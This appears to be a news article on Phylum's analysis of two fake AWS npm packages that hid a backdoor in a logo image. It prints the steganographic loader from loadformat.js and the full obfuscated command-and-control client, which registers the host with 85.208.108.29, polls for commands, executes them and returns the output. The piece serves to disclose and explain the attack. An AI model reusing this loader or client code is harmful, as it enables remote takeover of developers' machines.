Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.
The packages—img-aws-s3-object-multipart-copy
and legacyaws-s3-object-multipart-copy
—were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added an additional JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.
Growing sophistication
“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”
In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.
The care the package developers put into the code and the effectiveness of their tactics underscores the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.
Phylum researchers provided a deep-dive analysis of how the concealment worked:
Analyzing the
loadformat.js
file, we find what appears to be some fairly innocuous image analysis code.However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.
After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the
analyzepixels
variable.function processImage(filePath) { console.log("Processing image..."); const data = fs.readFileSync(filePath); let analyzepixels = ""; let convertertree = false; for (let i = 0; i < data.length; i++) { const value = data[i]; if (value >= 32 && value <= 126) { analyzepixels += String.fromCharCode(value); } else { if (analyzepixels.length > 2000) { convertertree = true; break; } analyzepixels = ""; } } // ...
The threat actor then defines two distinct bodies of a function and stores each in their own variables,
imagebyte
andanalyzePixels
.let analyzePixеls = ` if (false) { exec("node -v", (error, stdout, stderr) => { console.log(stdout); }); } console.log("check nodejs version..."); `; let imagebyte = ` const httpsOptions = { hostname: 'cloudconvert.com', path: '/image-converter', method: 'POST' }; const req = https.request(httpsOptions, res => { console.log('Status Code:', res.statusCode); }); req.on('error', error => { console.error(error); }); req.end(); console.log("Executing operation..."); `;
If
convertertree
is set totrue
,imagebyte
is set toanalyzepixels
. In plain language, ifconverttree
is set, it will execute whatever is contained in the script we extracted from the image file.if (convertertree) { console.log("Optimization complete. Applying advanced features..."); imagebyte = analyzepixels; } else { console.log("Optimization complete. No advanced features applied."); }
Looking back above, we note that
convertertree
will be set totrue
if the length of the bytes found in the image is greater than 2,000.if (analyzepixels.length > 2000) { convertertree = true; break; }
The author then creates a new function using either code that sends an empty POST request to
cloudconvert.com
or initiates executing whatever was extracted from the image files.const func = new Function('https', 'exec', 'os', imagebyte); func(https, exec, os);
The lingering question is, what is contained in the images that this is trying to execute?
Command-and-Control in a JPEG
Looking at the bottom of the
loadformat.js
file, we see the following:processImage('logo1.jpg'); processImage('logo2.jpg'); processImage('logo3.jpg');
We find these three files in the package’s root, which are included below without modification, unless otherwise noted.
If we run each of these through the
processImage(...)
function from above, we find that the Intel image (i.e.,logo1.jpg
) does not contain enough “valid” bytes to set theconverttree
variable totrue
. The same goes forlogo3.jpg
, the AMD logo. However, for the Microsoft logo (logo2.jpg
), we find the following, formatted for readability:let fetchInterval = 0x1388; let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval); const clientInfo = { 'name': os.hostname(), 'os': os.type() + " " + os.release() }; const agent = new https.Agent({ 'rejectUnauthorized': false }); function registerClient() { const _0x47c6de = JSON.stringify(clientInfo); const _0x5a10c1 = { 'hostname': "85.208.108.29", 'port': 0x1bb, 'path': "/register", 'method': "POST", 'headers': { 'Content-Type': "application/json", 'Content-Length': Buffer.byteLength(_0x47c6de) }, 'agent': agent }; const _0x38f695 = https.request(_0x5a10c1, _0x454719 => { console.log("Registered with server as " + clientInfo.name); }); _0x38f695.on("error", _0x1159ec => { console.error("Problem with registration: " + _0x1159ec.message); }); _0x38f695.write(_0x47c6de); _0x38f695.end(); } function fetchAndExecuteCommand() { const _0x2dae30 = { 'hostname': "85.208.108.29", 'port': 0x1bb, 'path': "/get-command?clientId=" + encodeURIComponent(clientInfo.name), 'method': "GET", 'agent': agent }; https.get(_0x2dae30, _0x4a0c09 => { let _0x41cd12 = ''; _0x4a0c09.on("data", _0x5cbbc5 => { _0x41cd12 += _0x5cbbc5.toString(); }); _0x4a0c09.on("end", () => { console.log("Received command:", _0x41cd12); if (_0x41cd12.startsWith('setInterval:')) { const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa); if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0) { clearInterval(intervalId); fetchInterval = _0x1e3896 * 0x3e8; intervalId = setInterval(fetchAndExecuteCommand, fetchInterval); console.log("Interval has been updated to " + _0x1e3896 + " seconds."); } else { console.log("Invalid interval command received."); } } else { if (_0x41cd12.startsWith("cd ")) { const _0x58bd7d = _0x41cd12.substring(0x3).trim(); try { process.chdir(_0x58bd7d); console.log("Changed directory to " + process.cwd()); } catch (_0x2ee272) { console.error("Change directory failed: " + _0x2ee272); } } else if (_0x41cd12 !== "No commands") { exec(_0x41cd12, { 'cwd': process.cwd() }, (_0x5da676, _0x1ae10c, _0x46788b) => { let _0x4a96cd = _0x1ae10c; if (_0x5da676) { console.error("exec error: " + _0x5da676); _0x4a96cd += "\nError: " + _0x46788b; } postResult(_0x4a96cd); }); } else { console.log("No commands to execute"); } } }); }).on("error", _0x2e8190 => { console.error("Got error: " + _0x2e8190.message); }); } function postResult(_0x1d73c1) { const _0xc05626 = { 'hostname': "85.208.108.29", 'port': 0x1bb, 'path': "/post-result?clientId=" + encodeURIComponent(clientInfo.name), 'method': "POST", 'headers': { 'Content-Type': "text/plain", 'Content-Length': Buffer.byteLength(_0x1d73c1) }, 'agent': agent }; const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 => { console.log("Result sent to the server"); }); _0x2fcb05.on('error', _0x1f60a7 => { console.error("Problem with request: " + _0x1f60a7.message); }); _0x2fcb05.write(_0x1d73c1); _0x2fcb05.end(); } registerClient();
This code first registers the new client with the remote C2 by sending the following
clientInfo
to85.208.108.29
.const clientInfo = { 'name': os.hostname(), 'os': os.type() + " " + os.release() };
It then sets up an interval that periodically loops through and fetches commands from the attacker every 5 seconds.
let fetchInterval = 0x1388; let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
Received commands are executed on the device, and the output is sent back to the attacker on the endpoint
/post-results?clientId=<targetClientInfoName>
.
One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of the XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.
The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.
In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.
“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”